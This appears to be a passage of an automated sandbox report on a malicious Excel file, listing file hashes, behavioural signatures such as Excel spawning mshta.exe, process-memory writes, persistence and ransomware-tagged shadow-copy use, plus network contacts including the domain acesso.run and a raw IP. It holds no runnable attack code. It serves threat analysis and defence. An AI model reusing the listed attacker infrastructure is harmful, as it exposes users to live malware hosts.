SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 8fe13ef2fb992c1b705126ea637ec394
SHA1 2429798ec68ac4e9b2849801e395515743193c71
SHA256 d562f57c441a59de074e406a104d1ef3500c90e7272d7bdff838965b7a9bbab3
SHA512 82cb9f266ab7be78bd3d9dd41c78a29c9e23647bd3df53942d24d18559a7fad2960f8e6751e229b3f8912f61df4063187f38e852e58de59244dd98fb81718db3

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-31 03:55

Reported

2024-10-31 03:58

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

141s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1040 wrote to memory of 3484 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 1040 wrote to memory of 3484 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 acesso.run udp
US 172.67.162.95:443 acesso.run tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 8.8.8.8:53 95.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 151.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/1040-0-0x00007FFED5050000-0x00007FFED5060000-memory.dmp

memory/1040-1-0x00007FFF1506D000-0x00007FFF1506E000-memory.dmp

memory/1040-2-0x00007FFED5050000-0x00007FFED5060000-memory.dmp

memory/1040-3-0x00007FFED5050000-0x00007FFED5060000-memory.dmp

memory/1040-4-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/1040-6-0x00007FFED5050000-0x00007FFED5060000-memory.dmp

memory/1040-10-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/1040-12-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/1040-11-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/1040-13-0x00007FFED2800000-0x00007FFED2810000-memory.dmp

memory/1040-9-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/1040-14-0x00007FFED2800000-0x00007FFED2810000-memory.dmp

memory/1040-8-0x00007FFED5050000-0x00007FFED5060000-memory.dmp

memory/1040-5-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/1040-7-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/3484-27-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/3484-31-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/3484-32-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/3484-34-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/1040-41-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/1040-42-0x00007FFF1506D000-0x00007FFF1506E000-memory.dmp

memory/3484-46-0x00007FFF14FD0000-0x00007FFF151C5000-memory.dmp

memory/3484-47-0x00007FF719F70000-0x00007FF719F78000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 2cb1ff32e01beb9ac861bf332bdb831c
SHA1 3041516d631a50dd5f5fea7c80bdc7561deaf270
SHA256 7845e60c2125dde5a868009434f8b3de89fb2a329fd20be1fb09aa882cedbcdc
SHA512 9b91f23f445db6decb2c88ec923467d44747205716f7e5af86c401a34c3afd5d5932408a446c2084cef95efdb28d61082153653d6b3567c08fd91d25887789e4